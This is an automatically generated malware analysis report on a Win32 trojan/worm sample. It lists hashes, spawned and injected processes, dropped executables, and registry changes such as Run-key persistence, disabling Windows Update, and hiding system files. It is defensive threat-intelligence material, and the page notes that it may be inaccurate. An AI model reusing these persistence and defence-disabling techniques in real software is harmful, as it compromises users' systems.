Gen.Variant.Midie.35218_e046c539bd

by malwarelabrobot on October 12th, 2017 in Malware Descriptions.

HEUR:Trojan.Win32.Generic (Kaspersky), Gen:Variant.Midie.35218 (B) (Emsisoft), Gen:Variant.Midie.35218 (AdAware), WormVobfus.YR, VirusVirut.YR (Lavasoft MAS)
Behaviour: Trojan, Worm, Virus


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: e046c539bd9731dbdf5471f28abfefe3
SHA1: 493694ce9fe975e6af564efd1fe1badbaa0b50e2
SHA256: e2632f5031ef1d7ef41ec56762615cbbabd69268c34dccbc849043715d21a695
SSDeep: 3072:jgSccsWlXCFLcVyg/G1YwohkFoN3Oo1 FvfS9CtJ/9v:jbDCuGNopCvfS9CVv
Size: 257943 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: SQW
Created at: 2004-09-12 12:55:29
Analyzed on: Windows7 SP1 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

ntvdm.exe:3432
jxqol.exe:4052

The Trojan injects its code into the following process(es):

balab.exe:3320
gomoz.exe:364
qnsaog.exe:1748
haeusa.exe:3948
tiisoh.exe:3180
e046c539bd9731dbdf5471f28abfefe3.usr:2372
pyyog.exe:772
zmloof.exe:3272
naezuid.exe:3280
tiaikar.exe:2644
caqap.exe:2416
%original file name%.exe:452
jxqol.usr:2056
peaab.exe:3032
zebex.exe:2016
kpwod.exe:3804
tiaot.exe:1980
gaejoa.exe:1564
gmras.exe:2132
ngqey.exe:2220
laudew.exe:1532
yoosex.exe:2204

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process balab.exe:3320 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\naezuid.exe (922290 bytes)

The process gomoz.exe:364 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\tiaot.exe (922290 bytes)

The process haeusa.exe:3948 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\caqap.exe (922290 bytes)

The process tiisoh.exe:3180 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\qnsaog.exe (922290 bytes)

The process e046c539bd9731dbdf5471f28abfefe3.usr:2372 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\peaab.exe (922290 bytes)

The process pyyog.exe:772 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\balab.exe (922290 bytes)

The process zmloof.exe:3272 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\kpwod.exe (922290 bytes)

The process naezuid.exe:3280 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\haeusa.exe (922290 bytes)

The process tiaikar.exe:2644 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\gomoz.exe (922437 bytes)

The process caqap.exe:2416 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\gaejoa.exe (922290 bytes)

The process ntvdm.exe:3432 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\scsAC9.tmp (335 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\scsADA.tmp (269 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\scsAC9.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\scsADA.tmp (0 bytes)

The process %original file name%.exe:452 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Adobe\Reader 9.3\Setup Files\Reader9\Setup.exe (444160 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Adobe\Reader 9.3\Setup Files\Setup.exe (408872 bytes)
C:\e046c539bd9731dbdf5471f28abfefe3.usr (145155 bytes)
C:\Windows\USR_Shohdi_Photo_USR.exe (6889123 bytes)
C:\Users\"%CurrentUserName%"\peaab.exe (252752 bytes)
C:\Windows\System32\USR_Shohdi_Photo_USR.rsu (45796 bytes)
C:\Users\"%CurrentUserName%"\jxqol.exe (252752 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Adobe\Reader 9.3\Setup Files\Reader9\Setup.usr (0 bytes)
C:\Windows\System32\USR_Shohdi_Photo_USR.rsu (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Adobe\Reader 9.3\Setup Files\Setup.usr (0 bytes)
C:\Users\"%CurrentUserName%"\peaab.usr (0 bytes)
C:\Users\"%CurrentUserName%"\jxqol.usr (0 bytes)

The process jxqol.exe:4052 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\jxqol.usr (145155 bytes)

The process jxqol.usr:2056 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\zebex.exe (922437 bytes)

The process peaab.exe:3032 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\jxqol.exe (922290 bytes)

The process zebex.exe:2016 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\tiaikar.exe (922437 bytes)

The process kpwod.exe:3804 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\laudew.exe (922290 bytes)

The process tiaot.exe:1980 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\ngqey.exe (922290 bytes)

The process gaejoa.exe:1564 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\tiisoh.exe (922290 bytes)

The process gmras.exe:2132 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\pyyog.exe (922290 bytes)

The process ngqey.exe:2220 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\yoosex.exe (922290 bytes)

The process laudew.exe:1532 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\gmras.exe (922290 bytes)

The process yoosex.exe:2204 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\zmloof.exe (922290 bytes)

Registry activity

The process balab.exe:3320 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU]
"NoAutoUpdate" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"ShowSuperHidden" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

"UNCAsIntranet" = "0"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"naezuid" = "C:\Users\"%CurrentUserName%"\naezuid.exe /X"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process gomoz.exe:364 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU]
"NoAutoUpdate" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"ShowSuperHidden" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

"UNCAsIntranet" = "0"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"tiaot" = "C:\Users\"%CurrentUserName%"\tiaot.exe /P"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process haeusa.exe:3948 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU]
"NoAutoUpdate" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"ShowSuperHidden" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

"UNCAsIntranet" = "0"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"caqap" = "C:\Users\"%CurrentUserName%"\caqap.exe /Y"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process tiisoh.exe:3180 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU]
"NoAutoUpdate" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"ShowSuperHidden" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

"UNCAsIntranet" = "0"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"qnsaog" = "C:\Users\"%CurrentUserName%"\qnsaog.exe /V"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process e046c539bd9731dbdf5471f28abfefe3.usr:2372 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU]
"NoAutoUpdate" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"ShowSuperHidden" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"peaab" = "C:\Users\"%CurrentUserName%"\peaab.exe /A"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process pyyog.exe:772 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU]
"NoAutoUpdate" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"ShowSuperHidden" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

"UNCAsIntranet" = "0"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"balab" = "C:\Users\"%CurrentUserName%"\balab.exe /D"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process zmloof.exe:3272 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU]
"NoAutoUpdate" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"ShowSuperHidden" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

"UNCAsIntranet" = "0"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"kpwod" = "C:\Users\"%CurrentUserName%"\kpwod.exe /k"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process naezuid.exe:3280 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU]
"NoAutoUpdate" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"ShowSuperHidden" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

"UNCAsIntranet" = "0"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"haeusa" = "C:\Users\"%CurrentUserName%"\haeusa.exe /m"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process tiaikar.exe:2644 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"ShowSuperHidden" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU]
"NoAutoUpdate" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"gomoz" = "C:\Users\"%CurrentUserName%"\gomoz.exe /r"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process caqap.exe:2416 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU]
"NoAutoUpdate" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"ShowSuperHidden" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"gaejoa" = "C:\Users\"%CurrentUserName%"\gaejoa.exe /T"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process jxqol.usr:2056 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU]
"NoAutoUpdate" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"ShowSuperHidden" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

"UNCAsIntranet" = "0"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"zebex" = "C:\Users\"%CurrentUserName%"\zebex.exe /G"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process peaab.exe:3032 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU]
"NoAutoUpdate" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"ShowSuperHidden" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"jxqol" = "C:\Users\"%CurrentUserName%"\jxqol.exe /v"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process zebex.exe:2016 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU]
"NoAutoUpdate" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"ShowSuperHidden" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"tiaikar" = "C:\Users\"%CurrentUserName%"\tiaikar.exe /I"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process kpwod.exe:3804 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU]
"NoAutoUpdate" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"ShowSuperHidden" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

"UNCAsIntranet" = "0"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"laudew" = "C:\Users\"%CurrentUserName%"\laudew.exe /h"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process tiaot.exe:1980 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"ShowSuperHidden" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU]
"NoAutoUpdate" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"ngqey" = "C:\Users\"%CurrentUserName%"\ngqey.exe /P"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process gaejoa.exe:1564 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU]
"NoAutoUpdate" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"ShowSuperHidden" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"tiisoh" = "C:\Users\"%CurrentUserName%"\tiisoh.exe /y"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process gmras.exe:2132 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"ShowSuperHidden" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU]
"NoAutoUpdate" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"pyyog" = "C:\Users\"%CurrentUserName%"\pyyog.exe /z"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process ngqey.exe:2220 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"ShowSuperHidden" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU]
"NoAutoUpdate" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"yoosex" = "C:\Users\"%CurrentUserName%"\yoosex.exe /E"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process laudew.exe:1532 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU]
"NoAutoUpdate" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"ShowSuperHidden" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

"UNCAsIntranet" = "0"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"gmras" = "C:\Users\"%CurrentUserName%"\gmras.exe /k"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process yoosex.exe:2204 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"ShowSuperHidden" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU]
"NoAutoUpdate" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"zmloof" = "C:\Users\"%CurrentUserName%"\zmloof.exe /u"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

Dropped PE files

MD5 File path
ecac9dcad09e8601fe2db2d0dea58d22 c:\Users\"%CurrentUserName%"\balab.exe
2c68ea1bd50bbb8196f0e0bcdc21735d c:\Users\"%CurrentUserName%"\caqap.exe
3b40dda4a39cabec5861b5efba236656 c:\Users\"%CurrentUserName%"\gaejoa.exe
8853ff7e43fac42f140bc06daac2774b c:\Users\"%CurrentUserName%"\gmras.exe
a8f544a3e4af101d3586fcacd4dc5713 c:\Users\"%CurrentUserName%"\gomoz.exe
38435917a09baa120341a1d564898010 c:\Users\"%CurrentUserName%"\haeusa.exe
5a5c3bae8b6cae7a2c3260286d49bedf c:\Users\"%CurrentUserName%"\jxqol.exe
fcb9d9622f4b7ac23bcf1e24c25f5903 c:\Users\"%CurrentUserName%"\jxqol.usr
519c9e372fcc4254fe9bbe4e4081ee6a c:\Users\"%CurrentUserName%"\kpwod.exe
026cc777dee00ea0db82616d5084d90b c:\Users\"%CurrentUserName%"\laudew.exe
61dcc62ad1481dc67a6cc1facb132a38 c:\Users\"%CurrentUserName%"\naezuid.exe
72e85f27cebdccd79de9e0b851892d4f c:\Users\"%CurrentUserName%"\ngqey.exe
b3112c6ce11538ee17cd736c9921cb74 c:\Users\"%CurrentUserName%"\peaab.exe
